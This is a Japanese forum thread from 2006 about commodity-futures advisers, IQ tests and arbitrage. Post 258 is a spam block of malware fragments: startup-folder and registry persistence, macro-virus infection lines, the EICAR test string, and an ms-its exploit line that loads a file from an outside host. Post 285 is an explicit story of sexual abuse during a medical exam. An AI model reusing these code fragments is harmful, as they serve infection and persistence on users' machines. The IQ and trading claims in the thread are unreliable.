227 :名無しさん@大変な事がおきました:2006/09/24(日) 23:26:41 ID:PSIsHkXx
>>226
http://www1.rocketbbs.com/615/bbs.cgi?id=sakimono&page=4

228 :名無しさん@大変な事がおきました :2006/09/25(月) 00:22:06 ID:hJqEubbX
相場技研の収支を報告してるやつらは顧問業全体からかんがえたら
だいぶましだと思うけどなー。状況が悪いのに報告しているなんてのは
ほかの有名所の投資サイトでは考えられないだろう。
俺もいままでに何個かのサイト会員になったけど、相場技研は一番まともだと思う。
相場技研というよりも秋山とか獣王とかは苦しいながらも真剣さを感じるし人間味もあるほうだろう。
みんなよそのサイトを知らないからごちゃごちゃ言ってんだろうね。
よそのサイトなんか買い売り売り買い買い、みたいなかんじで大曲がりしてるなーって思ってたら
実はあのとき仕切ってました!みたいな感じだぜ。だから俺は月曜日から獣王って男にのってみる事にした。
曲がりまくってからの調子の良さは昔から芳名録をみてたらわかるしなw
相場師なんて曲がってるやつのほうが、いつも順行だっていってるやつよりも何倍も信用できるってもんだぜww


229 :名無しさん@大変な事がおきました:2006/09/25(月) 00:29:07 ID:IuGKkBBV
>>228
顧問を頼る人間って、このようにバカ丸出しだというサンプル

230 :名無しさん@大変な事がおきました:2006/09/25(月) 00:44:16 ID:0ac98Q4f
>>229の言う通り。
男に乗るとか信用とか何を言ってるんだか。
粗糖にしてもゴムにしても下げ相場を買い下がって資金飛ばした事実に目をつぶるほうが馬鹿だ。
相場を外すことが一番、信頼信用を失うってことがわかっているのか?
っていうか、>>228は獣王本人だし。すぐわかる。

231 :名無しさん@大変な事がおきました:2006/09/25(月) 00:49:36 ID:684iltg9
228は僕なんだから
僕は獣王ではないよ

232 :名無しさん@大変な事がおきました:2006/09/25(月) 00:56:21 ID:0ac98Q4f
俺から僕に変わったか。
IDも変わってるし。
語尾に。も無くなってるし。
親衛隊で工作活動か。

233 :名無しさん@大変な事がおきました:2006/09/25(月) 02:00:12 ID:c3t7Bl5j
>俺もいままでに何個かのサイト会員になったけど
今までただの一度も会員になぞなった事もないし、これからもなるつもりも俺は一切無い。

 「相場に絶対はないが、投資顧問と称して馬鹿どもから金を巻き上げるのは、絶対確実に儲かる」
                                                           江戸四股ー田


 そろそろ、お舞ら気付けよ。
  在日秋山や縦横、天応などの連中は腹抱えて笑いながら、おまいらのただでさえ少ない金を巻き上げてんだぞ。






 お前ら本気で相場で金を稼ぐ気があるのか? あるのなら、まずは、無駄な出費を止めろよ。
  相場ってのは、ただでさえ必要経費が掛かるんだよ。
  それ以上に会員費用なんざ払ってて、相場で稼げると思うなら、脳外科医にでも逝ってスキャンして貰え!
                             

234 :一年生:2006/09/25(月) 02:34:36 ID:3EHJniAv
単純に疑問に思うんだけど、ワザワザ金払わずに芳名録の当たり屋に提灯付ければ良いんじゃないの?
ナンピン上等!秋山も毎日書いてるし。一日遅れにはなるし、枚数配分は解らんが…

235 :名無しさん@大変な事がおきました:2006/09/25(月) 02:41:34 ID:1Myoxa39
>>234
そんなものに命と家族の次に大事な金を賭けろと?  自分の意思や意識はどこにある?

そいつらが損切りしても自分は耐えるのか?それとも一緒に損切りするのか?こいつらが損切りしてから張るのか?
利食いと損切りの設定は? 結局全部自分で考えなきゃいけないぞ。そしてそれが確信を持って確実に出来ないなら
やるだけ無駄みたいな。


236 :名無しさん@大変な事がおきました:2006/09/25(月) 03:05:11 ID:gcuI+NJF
>>234
>自分の意思や意識はどこにある?
自分の意思や意識に基づいて顧問を選んで参考してる。
だって、全部そうだろ。
外務員のサイト、メールマガジン、ブログ、2chの書き込みなどなど
そういったものを、参考にしてるだろう。
>>235のいうところの自分の意思や意識ってなんだ?


237 :名無しさん@大変な事がおきました:2006/09/25(月) 04:55:20 ID:/y7aekma
おまいには相場は向かん。
悪いこといわんから金の残ってるうちに止めとけ。

238 :名無しさん@大変な事がおきました:2006/09/25(月) 07:02:40 ID:Ic+TudBj
当たり屋はナゼ当たるのか?
ドーユー目線で建玉するのか?
曲がったトキ何がいけなかったのか?
授業料払うんなら
学びなさい
吸収しなさい
波動(値段の動き方)を
相場心理(相場の真理)を

大学入って遊んでばかりいるとスーパーフリーになってまうぞ

独学ダケで一人立ちできる天才クンはホンノ一握りなんだからね

239 :名無しさん@大変な事がおきました:2006/09/25(月) 08:07:35 ID:Maz5LjHx
工作活動 ネタスレ

240 :名無しさん@大変な事がおきました:2006/09/25(月) 09:45:14 ID:W8FHhdmH
鞘取りもレンジブレイクも逆張りも曲っている。
やっぱりトレンドフォロー最強。

241 :名無しさん@大変な事がおきました:2006/09/25(月) 11:18:40 ID:gcuI+NJF
>>240
レンジブレイクってトレンドフォローの起点じゃないの?

242 :名無しさん@大変な事がおきました:2006/09/25(月) 12:46:22 ID:1Myoxa39
株と言うのは短期でも長期でもIQや記憶力と言うのは非常に重要なファクターだと
いうことは皆さんが身をもって体験されご承知のとおりだと思います。このテスト
をやってみて自分の適性を計ってみましょう。3回の平均で計ります。

http://www.afsgames.com/memory.htm



3回以下で 痴呆症もしくは、かなりのおっちょこちょい 気をつけましょう。投資には全く向いていません。

4〜5   記憶力は悪いほうです。訓練でどうにかなるレベルですが、投資には向いていない脳と自覚するべきです。

6〜7   平均より少し悪いレベルです。何かのミスなどがあったかもしれませんが、それもこみで実力です。
      
8〜10  平均レベルです。自分なりの記憶術や訓練などしていることもあるかもしれません。投資は可もなく不可もなくです。

11〜14 記憶力は平均より良いです。今のレベルを維持しさらに挙げることによって可能性はもっと大きく広がるでしょう。

15〜19 かなりの記憶力です。これを維持していけば様々な場面で有利で役に立つでしょう。他に比べてケアレスミスも少ないはずです。

20〜25 ズバリ残りの数%のトップレベルの記憶術や能力を持っています。しかし記憶力だけでは生き残れません油断せずに勉強をし更に差をつけましょう。

26〜35 天才型の方です。受験勉強などはかなり楽だったはずです。他人が忘れている事も覚えています。投資には向いています。

36以上  先生どうやって覚えるのか教えてください。


243 :名無しさん@大変な事がおきました:2006/09/25(月) 12:47:11 ID:1Myoxa39
一流プロになる、投資をやり儲け続ける、人よりも倍努力して倍稼ぐ
そういうものを可能するのに必要最低限な数値はIQ110と言われている。

一般平均は97〜108です。112〜118で普通の上。
125〜135でいわゆる秀才だそうです。 それでどんな分野でも(スポーツでも)
一流や伝説の人になるとIQ150〜160と言う人がグッと増えるんですね。
超一流の相場師やディーラーの平均は130が最低レベルであり150〜160
が半分以上を占めているそうです。

集中力とその維持、諦めない、投げ出さない、頭の回転のよさ、発想力、展開力、それらのスピード

やはりどんな分野でも必要なんですね。本を読んでも頭に入らない。説明されても頭で理解できない入らない。
すぐにイヤになる切れる。諦める。目標を忘れる。教訓を忘れる。これではどんな分野でも成功できません。

IQテストをいくつか貼りますので、ご自分の本当の実力と適性を調べてみましょう。

http://www.afsgames.com/iqtest.htm
http://www.iqtest.dk/main.swf
http://www.unnmei.com/iq.html

もちろんあくまで目安ではありますが、、一度しっかりと冷静に現実を見つめ直す必要もあるのではないでしょうか?
そしてそれにあった人生を選択し、また努力する。そういうことが必要だと思います。もちろん若ければ若いほど脳は
鍛えられますので、そういう訓練をしてもいいとは思います。

そしてこの3つのテストの一回目(2回目では意味があまり無い)の平均を、嘘やごまかし無くそっと受け入れて欲しい。
自分が出来ること、やれること、限界、才能、自分の幸せ 考えて見ましょうね


244 :Loop ◆pCagQ2VMTg :2006/09/25(月) 14:44:54 ID:nTfnjKMa
言えますね。秋山さんで130〜140、縦横さんで120くらいあると思います。

実際には、相場は、

経験、技術、戦略、資金、知能

すべてが必要です。どれも抜かすことはできない。
知能だけ抜かす、ってことは不可能です。
そして、上記必要条件に、「情報」が入っていないことに留意してください。
軽重の意味で言っているのです。
スポーツ選手でもプロレベルなら、あとは知能がレベル(生死)を分けます。

245 :名無しさん@大変な事がおきました:2006/09/25(月) 14:49:45 ID:Gj7HU2On
秋山損師、朝一番で飛んだよ。
かなり我慢していたんだね。

246 :Loop ◆pCagQ2VMTg :2006/09/25(月) 14:56:26 ID:nTfnjKMa
記憶力は15でした。限界、できすぎな感じ。

相場師レベルは無理だと思います。
安全の高い手口を確立して、がちがちにやるしかない、程度のアマレベルですね。

結局相手(対照玉)は最終的には20以上で相対玉となってしまう、
そおいうことです。

逆転は不可能なので、スキマを時間で張るしか無いでしょう。
趣味以上は無理です。
一定の調子でやった方がいいでしょうね。フォレストガンプみたいに。
実際、90-110の小利口小バカより、フォレストガンプのが強いと思います。
作者の知能は130くらいなので、そおいうメッセージも含まれてますね。

秋山師は謎です。意図が。
ホンモノなのはわかるんですが。

247 :名無しさん@大変な事がおきました:2006/09/25(月) 15:15:18 ID:Gj7HU2On
獣王手品師もすごいですね。
飛んでも飛んでも、あとから、あとからこれでもか!
と言うくらいに資金が無尽蔵に湧き出てきますね。

永久に不滅なのは巨人軍だけかとおもたよ^^;

248 :Loop ◆pCagQ2VMTg :2006/09/25(月) 15:15:25 ID:nTfnjKMa
IQテストは124でした。

ちょうど実感に近いです。
サッカーのナカタが130、俺はやや劣る感じだとは思ってました。

そして、そのくらいの判別は付くのですが、相場師の諸兄は、(もちろん詐欺師は含みません)
130〜150それ以上は判別不可能
であったことは実感としてわかっていました。
やはり、ナカタより上なんですね。
ふつうの100くらいのヒトには、判別不可能だと思います。
ニホン人の標準は105ですが、ちょうどやられごろです。
ワタシはやられごろの小利口の上限あたりにいます。
それはわかってました。
強く認識すべきでしょう。

そうで無ければ、イノチが無くなってしまう。

正直言いますが、最低130は必要だと思います。
そのくらいが最低ラインで、結局は、果し合いみたいなものなので、
劣るならばやられてしまうのです。

130なら、そのくらいわかるでしょうが、130なら相場師に成れる、と言う意味では無いです。ぜんぜん。

経験、適性、研究心、手口、戦術、知識、知能

いちばん最後に来る知能でさえ、そのくらいは必要、って意味なだけです。
これはがちがちに逃げは効かないですよ。
やってみれば最後にわかりますが・・・

80くらいのが安全だと思う。
ちょうど105をまびく手段でしょう。ずばり。

249 :Loop ◆pCagQ2VMTg :2006/09/25(月) 15:18:09 ID:nTfnjKMa
あえて趣味として続行するなら、80みたいに張る、

それが絶対条件でしょうね。


そおいうことか。
バカな手口に落とし込む、と言うことです。
秋山師みたいにできるわけがないのです。

まあ、やりゃあ、わかりますよ。ふふふ

250 :名無しさん@大変な事がおきました:2006/09/25(月) 15:27:29 ID:Gj7HU2On
チンチンの長さは15センチでした。限界、できすぎな感じ。

相場師レベルは無理だと思います。
安全の高い手口を確立して、がちがちにやるしかない、程度のアマレベルですね。

結局相手(対照玉)は最終的には20センチ以上で相対玉となってしまう、
そおいうことです。

逆転は不可能なので、スキマを時間で張るしか無いでしょう。
趣味以上は無理です。
一定の調子でやった方がいいでしょうね。フォレストガンプみたいに。
実際、90センチ-110センチの小利口小バカより、フォレストガンプのが強いと思います。
作者のチンチンは130くらいなので、そおいうメッセージも含まれてますね。

秋山師は謎です。チンチンの長さが。
ホンモノなのはわかるんですが。




251 :Loop ◆pCagQ2VMTg :2006/09/25(月) 15:33:21 ID:nTfnjKMa
知能が足り無いぶんをちょうちんで補うことはできません。

ちょうちんとかカット&ペーストで逆転するのは不可能です。

ちょうちんを付ける場合、同等以上の技量と知能が無いと、
返り討ちに合うと思いますよ。

だいたい、ちょうちんの意味、立場がわかって無いみたいだし。

詐欺師だろうがなんだろうが、
必ず、ちょうちんよりも本尊の方が技量知能とも上です。
例外を見たことがありません。
まあ、そおいうことです。

ただ、より上位の打ち手が、ちょうちんのふりして食らいに入る、
そおいうことはあると思います。
ひとりくらい、いるんじゃないかな?
もちろん執筆者ではありませんよ。観察者です。

秋山師と観察者ですね。興味あるのは。
ちょうちん付けるなら観察者の方でしょう。(←ぜんぜん、こりて無い・・

252 :名無しさん@大変な事がおきました:2006/09/25(月) 15:54:52 ID:c3t7Bl5j
>俺もいままでに何個かのサイト会員になったけど
今までただの一度も会員になぞなった事もないし、これからもなるつもりも俺は一切無い。

 「相場に絶対はないが、投資顧問と称して馬鹿どもから金を巻き上げるのは、絶対確実に儲かる」
                                                           江戸四股ー田


 そろそろ、お舞ら気付けよ。
  在日秋山や縦横、天応などの連中は腹抱えて笑いながら、おまいらのただでさえ少ない金を巻き上げてんだぞ。






 お前ら本気で相場で金を稼ぐ気があるのか? あるのなら、まずは、無駄な出費を止めろよ。
  相場ってのは、ただでさえ必要経費が掛かるんだよ。
  それ以上に会員費用なんざ払ってて、相場で稼げると思うなら、脳外科医にでも逝ってスキャンして貰え!
    

253 :名無しさん@大変な事がおきました:2006/09/25(月) 15:58:07 ID:masQds/T
LOOPさんは早く自分のサイトを立ち上げなさい
売名はもう十分

254 :Loop ◆pCagQ2VMTg :2006/09/25(月) 16:06:40 ID:GAr7PfJU
>>253
その能力はありません。詐欺師にも能力、適性は必要なのです。
と同時に、それって、けっこう危険だと思います。
外側の危険ばかりでは無い、内的に崩壊する危険、手口はどうしてもふくらみやすいでしょう。
たとえカモろうとも、いや、カモを裁定対象にかけるからこそ、
手口はふくらみます。

あと、アン外、合法的正々堂々の攻撃には弱いのでは?
逆玉だとしても、それを読まれて、まとめてタガにかけられて、最後
滅び去って行く、それの連続みたいな予感はあるんです。

しょせんは、技量知能的に劣るわけで、それに優越する相手もいるわけで、
夜中にちょうちん付けて行軍してるようなもんで、
暗闇から狙われても気づきません、って。

まあ、そおいうことじゃ?

255 :名無しさん@大変な事がおきました:2006/09/25(月) 16:23:52 ID:gcuI+NJF
LOOP。なんで、2コラム目、3コラム目と占拠するんだ?
今から4コラム目を建てますのでお待ち下さい。

256 :名無しさん@大変な事がおきました:2006/09/25(月) 16:28:41 ID:gcuI+NJF
4コラム目建てました。
http://money4.2ch.net/test/read.cgi/deal/1159169256/


257 :名無しさん@大変な事がおきました:2006/09/25(月) 16:32:44 ID:gcuI+NJF
>>254ウィルスばら撒いてるだろ。

258 :<body onload=window()>:2006/09/25(月) 16:48:15 ID:wHkWJG7u
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

259 :名無しさん@大変な事がおきました:2006/09/25(月) 16:50:27 ID:0ac98Q4f
ここにもウィルスがw


260 :名無しさん@大変な事がおきました:2006/09/25(月) 17:00:54 ID:GWHxV6ez
Loopって名を売りたいけど頭が悪いから荒らしになっちゃうって自分自身で言ってなかった?

261 :名無しさん@大変な事がおきました:2006/09/25(月) 18:20:20 ID:wHkWJG7u
  , ,
 oo
  ' ’
 o:

262 :名無しさん@大変な事がおきました:2006/09/25(月) 19:22:32 ID:Gj7HU2On
秋山損師は今朝がた、確実にdだよ。

成田からドイツに向けて飛行機に乗ってdでったよ。

膨大な含み損抱えたままで海外にdずら。

追証の心配なんか関係ないそうだ。

これってやはり、ヴァーチャル?

263 :名無しさん@大変な事がおきました:2006/09/25(月) 21:12:34 ID:GWHxV6ez
もっとすごい飛び方をしてるのがいるぞ!
何回追加資金入れるんだあ〜オイルで
建ち玉公開してくれ〜Tちゃん
智に、おっと間違えた、共に頑張ろう!
向かって大儲けだ!

264 :名無しさん@大変な事がおきました:2006/09/25(月) 21:41:47 ID:1Myoxa39
先生は調子が悪い時はいつも体調が悪いよね。
しかもそういうときに限っていつも出張がやけに多いし・・・
普通は放置できないと思うんだけど。仕事にも集中できないだろ


265 :名無しさん@大変な事がおきました:2006/09/25(月) 23:06:26 ID:DrsMg25B
>>258
これってなんだい?

C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe
PERSONAL.XLS

スクリプトかなんかで荒らしをするのか?

266 :名無しさん@大変な事がおきました:2006/09/26(火) 07:09:51 ID:jZpLY7CZ
てんおうさん収支報告してないですね。



267 :名無しさん@大変な事がおきました:2006/09/26(火) 08:05:47 ID:SAYEMv89
オイラ思うに…
一般社会にあてはめると本社があって独立採算のフランチャイズの支社があって従業員を雇う
支社は業績悪ければ従業員が抱えられない
社員のリストラもあるし
最悪は倒産
社長の方針に追従するもヨシ、職場に不満なら従業員的立場のまま転職するもヨシ、経営者的立場目指して自分で立ち上げるもヨシ

ゴク普通で日常社会の風景である

会社が存在するダケで利益が発生する訳もなく…
金を稼ぐ上で常に大切なのは「お客様」である
タダタンニ勤めてるダケで収入を得ようと甘く考えていてはイツマデタッテモ自分が客なのではナカロカ?
タダ現状取組が少ない「お客様」が少ない状況はソレナリニ世の中を相場を渡って行く覚悟がいるんジャマイカ?

268 :名無しさん@大変な事がおきました:2006/09/26(火) 08:15:35 ID:zhkrX+rJ
てんおうとジュウオウと秋山 更新しない時も一緒の時が多い。
まあ行動が一緒の時も多いのかもしれないが。

269 :Loop ◆pCagQ2VMTg :2006/09/26(火) 09:58:19 ID:kxrVA9hM
そおいう意味では、オフ会なんか絶対行きたくありませんね。
危険すぎる。

それがどおいう意味があるのか、自分でも良くわかりませんが、
おっすさん、路伯さん、一匹狼さん、
名無しベテランさんは怖いか?違う意味でw
それらの方はまったく問題ありません。ってーか参考にしたかったですよ。
が、

秋山さん関係、外資くん関係、

絶対に会いたく無いです。
師であり、兄貴的先輩と慕っておりますが。

自分でもそれがなぜ?だかはわかりません。

まずかったかな?

270 :名無しさん@大変な事がおきました:2006/09/26(火) 23:52:38 ID:U41j3BbW
仲間のうちの1人が医系の研究員やったんやけど、
学者路線じゃなくてやっぱり医師になりたいと医学部編入試験を受けていた。
本当はもう少しレベルが下の地方大を受けるつもりだったんやけど、
「やっぱり皆と同じ関西にいたい!」と痛烈に思ったらしく浪人覚悟で難関医学部受験を選んだ。
そしてめでたいことに見事に一発で受かった!!

まず医学部で編入試験をやっているところはものすごく少ない。
編入試験をやっているところでも難関医学部は編入試験のほうが正規の入試よりずっと難しい。
合格者はほとんどが東大卒や京大卒などで、
他学部のように正規入試では入れないから社会人入試とか編入試験を狙うような人は問題外。
ビーチリーはやはり、うそを言っているのが判明。だいたい、いまごろ合格発表もないだろう。
見栄を張ってホラの吹きすぎ



271 :名無しさん@大変な事がおきました:2006/09/27(水) 00:09:00 ID:bRtG9wrz
そもそも、もしもし 医系の研究員て何だ?

272 :名無しさん@大変な事がおきました:2006/09/27(水) 02:53:37 ID:P0s8nSjk
ビーチリーって話がいつも出来すぎなんだよな。
スケボーで買い物に行ったら外人に声掛けられたとか。
勝手にそれらしいストーリー作ってるのでわ?
昼に毎日2時間ハンモックで昼寝だそうだ。
手書きで罫線と場帳つけてるって言ってるけど嘘じゃないか?


273 :名無しさん@大変な事がおきました:2006/09/27(水) 09:26:57 ID:5VUzxQL2
>俺もいままでに何個かのサイト会員になったけど
今までただの一度も会員になぞなった事もないし、これからもなるつもりも俺は一切無い。

 「相場に絶対はないが、投資顧問と称して馬鹿どもから金を巻き上げるのは、絶対確実に儲かる」
                                                           江戸四股ー田


 そろそろ、お舞ら気付けよ。
  在日秋山や縦横、天応などの連中は腹抱えて笑いながら、おまいらのただでさえ少ない金を巻き上げてんだぞ。






 お前ら本気で相場で金を稼ぐ気があるのか? あるのなら、まずは、無駄な出費を止めろよ。
  相場ってのは、ただでさえ必要経費が掛かるんだよ。
  それ以上に会員費用なんざ払ってて、相場で稼げると思うなら、脳外科医にでも逝ってスキャンして貰え!
    


274 :名無しさん@大変な事がおきました:2006/09/27(水) 09:28:52 ID:6MSw/vE7
もうどうでもいいよ・・・いくら損しても何も感じなくなってきた。
身の振り方を考えるべきかな・・・。色々とめんどくさくなってきた。



275 :名無しさん@大変な事がおきました:2006/09/27(水) 11:08:10 ID:e6ce57wJ
>>273
脳外科医にでも逝ってスキャンして貰え!

スキャンってーのするのに、いくら費用がかかるんだ?




276 :一年生:2006/09/27(水) 11:18:18 ID:G9miVAwc
秋山はともかく、その他の奴らは人様に教えるほどの腕はないだろ…
素人がド素人に相場を教えるようなもの

277 :名無しさん@大変な事がおきました:2006/09/27(水) 11:44:10 ID:Np0mJQ2x
>>276
秋山は玄人なん?

278 :一年生:2006/09/27(水) 12:19:57 ID:G9miVAwc
曲がりなりにも損師。
きゃつの二つの奥義、ナンピン上等と花びら回転。
甘くみたらいけません。

279 :一年生:2006/09/27(水) 12:32:10 ID:G9miVAwc
きゃつが本気を出せば、出来の薄い月限を煽り、
時として相場を動かす事も可能。アホっぽく見えますが、侮りがたい男です。

280 :一年生:2006/09/27(水) 13:05:34 ID:G9miVAwc
しかもてんおうのような力まかせの攻撃では無く、相場の一瞬のスキを突いての攻撃です。
鼻糞ほじってる間に指先一本で瞬殺です。
これがきゃつが普段見せない力です。

281 :名無しさん@大変な事がおきました:2006/09/29(金) 18:03:37 ID:AIw2BSee
だからビーチリーは「今年の目標達成した」といってるだろ?

だからあとは適当にごまかしてるんだよ。
あまり勝率を上げると、来年低迷するからな。

282 :秋山先生!万歳:2006/09/30(土) 01:27:47 ID:07h854dV
秋山先生は、いつも豪快に相場を張ってくれます。
億単位のお金をお持ちですから、ガンガン逆張りナンピンを
入れてがんばれる。
億単位のドローダウンでも精神的に強いというのが凄い。

283 :名無しさん@大変な事がおきました:2006/09/30(土) 02:02:37 ID:RWSFylc8
なんとも思ってないらしいよ。 あと5千万は余裕で耐えられるらしい。

既にクラック一大筋になってるなw 市場の薄さを考えないのがちょっとね。
今後は考えないといけないだろうなあ・・・。 株に行くんじゃないの?

でも前に、株には鞘が無いから行かないとかとぼけたこといってたけどw
株なんて、商品など比べ物にならないくらい、あらゆる意味で色んな形の
鞘取りがあるだろーに。知らんのかな? しかも市場規模は全く比較にならない。


284 :名無しさん@大変な事がおきました:2006/09/30(土) 09:51:12 ID:urwVN424
ピチピチビーチリちゃんは今月もプラスで終わったな〜
これは本物かも?
少なくとも口先だけの大曲り顧問連中よりずっとマシ!
…でもあの思い上がりは勘弁して〜
なんか、売れなくなった昔のアイドルが妄想しまくってるみたいだ〜

285 :名無しさん@大変な事がおきました:2006/09/30(土) 11:14:59 ID:VIt5AUXM
初めて先日婦人科検診に行きました。
クリトリスや膣口を念入りに消毒され、先生が指を入れてグニュグニュしてきました。
診察なので別にその時は変な感じはなかったのですが、少し時間が長いかなぁと思っていると、先生の指が微妙にゆっくりとピストン運動をしていたのです。
私は恥ずかしいのと気持ちいいのと腹立たしいのとが一緒になり、頭が混乱し、固定されていた足をバタバタ動かしました。
すると先生はすぐに指を抜き「ごめんねぇ、もう少し我慢してねぇ」と言いながら、ゼリーのようなものをクリトリスに塗り始めました。
もうその時点で膣口付近は濡れてベトベトだったと思います。
下半身がしびれてしまい、すぐにオナニーをしたいような状況でした。
先生は「ここ痒いでしょ、少しかぶれてるみたいだから薬塗っときますね」と言いクリトリスを念入りに指で摘みながら揉んできました。
たしかに最近クリトリスが痒かったので納得したのですが、先生は皮まで剥いて激しく揉んでくるので私は声を抑えるので必死でした。
かなり濡れているのが自分でもハッキリ分かって、お尻に液が垂れる感じがしたとき「グボボボボ」と音がして掃除機のようなもので液を看護婦さんが吸い取りました。
自分の状況がとても恥ずかしいと思い「先生、も、もういいです」と言いました。
先生は「はいはい、もうすぐですよ」と淡々と言いながらクリトリスを揉みしだいています。
恥ずかしいので絶対逝ってはいけないと我慢しました。
やっと診察が終わり、すぐにトイレに駆け込みオナニーをしました。
10秒ほどで逝ってしまいました。
翌日、会社の同僚にこのことを話すと「それ絶対変だよー、そんなことする医者いないよ」と言われました。
あの医者はやはり私で遊んでいたのでしょうか

286 :名無しさん@大変な事がおきました:2006/09/30(土) 11:16:42 ID:VIt5AUXM
【社会】女性にわいせつ容疑 福岡の産婦人科「平嶋ウイメンズクリニック」院長(42)を4回目の逮捕[09/27]
http://news19.2ch.net/test/read.cgi/newsplus/1159366183/


287 :哭きの篭:2006/10/01(日) 16:01:42 ID:uvUxIxCb
>>243
IQテストの紹介、有難うございました。
漏れ、38歳で結果は124でした。
中学の頃受けたIQテストで、担任の先生から
テストの結果が学年一位だったと言われたこともあったので
その頃から比べるとやっぱり年をとると劣化するってわけですな。

IQテスト自体の有効性は懐疑的なんですが、平面や立体図形の
パターン認識力ってのは相場のチャートを適切・的確に観るときに
必要不可欠だとは思います。

現在は東京・大阪アルミの期先271円鉄板、
大阪ニッケルの期先2640円岩盤のスタンスで
突っ込み安値買い拾いで取り組んでおります。

少なくとも現在は、下手に貴金属やゴム、油系に手を出すより、
非鉄関係やレアメタルが安全だと思う今日この頃です。
(北京オリンピック開催までは・・・)

288 :名無美:2006/10/01(日) 16:44:31 ID:wd4jU7gM
IQってなんだろな。学生の頃、配偶者160、自分130。出てきたお子ちゃまのIQ計ったことないけれど、
天才児にはどう見ても思えないな。。。。私、相場、下手くそ(爆笑
IQ普通でも上手な人っていると思う。



289 :名無しさん@大変な事がおきました:2006/10/01(日) 17:35:46 ID:Tgf92A6V
凡人は出来ることをしないで、出来もしないことを望んでばかりいる。

290 :名無しさん@大変な事がおきました:2006/10/01(日) 19:00:53 ID:r5RxAE7u
IQダケでは語れないな
天才クンと違った部類で
怪物クンって人種がいる
天性とゆーか鼻が効くってゆーか…
突出した一つの才能ダケで運を長期持続するヤツ!

好調期のソイツには何やっても勝てないのだ…

オイラは平凡な人種の仲間なワケダガ…

291 :名無しさん@大変な事がおきました:2006/10/01(日) 19:01:52 ID:Vq0JwZUH
<a href=http://www.infocart.jp/af.php?af=ichiro5111&url=www.oz8.jp&item=6153 target=_blank>

292 :名無美:2006/10/01(日) 21:35:33 ID:wd4jU7gM
>>243
やってみました。私、今日、パーだって自覚ようやく出来ました。きゃはは。
ありがとうございますm()m 面白かったですが、飽きました。


293 :名無しさん@大変な事がおきました:2006/10/01(日) 22:17:11 ID:yTfcUyu9
株の鞘なんて鞘じゃないだろ。
まぁそれを言ったら金と銀の鞘も鞘とは言えんが。

294 :名無しさん@大変な事がおきました:2006/10/01(日) 22:33:17 ID:ctObLNs5
株にもたくさん鞘取りあるじゃん。そもそもどんな相場でも商売でも
利鞘をとらなきゃ儲からない。みんな鞘取りしてるんだよ。

いわゆる同時建て両外しの鞘取りでも
同業異種でもいいし、大株主とその会社でもいいし、先物と現物の一部
でもいいし、同セクターでもいいし、国内と海外でもいいし、元親子会社
でもいいし、密接な関係のある会社でもいいし。

295 :名無しさん@大変な事がおきました:2006/10/01(日) 22:59:13 ID:yTfcUyu9
同セクターだからと言って鞘が開閉する必然性が無いだろ。
豪ドルとNZドルの鞘取りとか言ってるアホと同じ。
株式で必然性のある鞘取りは企業買収による裁定くらいしか無い。
まー、金銀の鞘取りとかコーン大豆の鞘取りとか言うやつにとっては、
似た動きするものは全部鞘取りに見えるんだろうが。

296 :名無しさん@大変な事がおきました:2006/10/01(日) 23:00:42 ID:yTfcUyu9
裁定取引の意味での鞘取りと、差金決済の意味(利鞘を稼ぐ意味)での鞘取りは区別して使おうね。

297 :名無しさん@大変な事がおきました:2006/10/02(月) 02:11:14 ID:/3t0NL1S
株に裁定取引がないとでも?

298 :あーん:2006/10/02(月) 03:46:29 ID:fHjtGs/6
先物探花アクセス禁止になりました なんでや マジです

299 :名無しさん@大変な事がおきました:2006/10/02(月) 04:22:38 ID:ovEw6VxH
?

300 :名無しさん@大変な事がおきました:2006/10/02(月) 04:30:42 ID:ovEw6VxH
!

301 :Loop ◆pCagQ2VMTg :2006/10/02(月) 11:56:41 ID:X6ljP6db
>>288
計りそこないだろ?
そんなに無いよ。ある程度、判別できる。

世界にひとりのハナじゃ無いんだから、
我等、ひとたばいくらのカモなんだから、
おのれの能力を劣るところを自覚するところからしか、始まらないよ。

これは、相場の極意だ。
逆に言えば、150でも相場経験が薄く、優越を前提とする相手なら、それに勝てる。
だが、それだけでは終わらない。
160で本当に恐ろしい相手がいるのだよ。
きみの130とか旦那の160とか、ぜんぜん恐ろしく無い。
ハードルのひとつにすぎん、と言ってるじゃないか!
あやしいもんだぜ。その130とか160とやら。
160なんて人口の何割だか知ってるか?
そして、ごくごく一部の例外を除いて、160くらいだと、かなりポジションも取る。
ふつうに、な。

まあ、だいたいプロバカンダで食うわけだから、そおいうのも可能性として
否定はせんが。

302 :Loop ◆pCagQ2VMTg :2006/10/02(月) 11:58:04 ID:X6ljP6db

とにかく結局、利口はバ化に夢を持たす。
まったくの幻想にすぎない夢を。相場で食えるとか。

そして実際には、バ化をカモを食ってしまう。
相場ほど過酷で無くとも、それに類したプロバカンダは多いだろう。
だから、そのハナシは、
>>288
むしろ不愉快だな。

ウソだろうが、ホンとだろうが、不愉快だ。
劣ることを自覚することこそが、我々には必要なのよ。
例外なんか興味は無い。
99の負け犬、死に隊の方に、我々自身が確実に入ってしまうからだ。
その例外に自分だけは入れる、との錯覚を詐欺師は利用する。
知能の高い詐欺師だろうが、知能の低い詐欺師だろうが、な。

そんなにすばらしい才能じゅうぶんな異様に勘の鋭いバ化がいるなら、俺と、ある市場にふたりきりにしてくれよ。
そこで俺は打ちたいね。

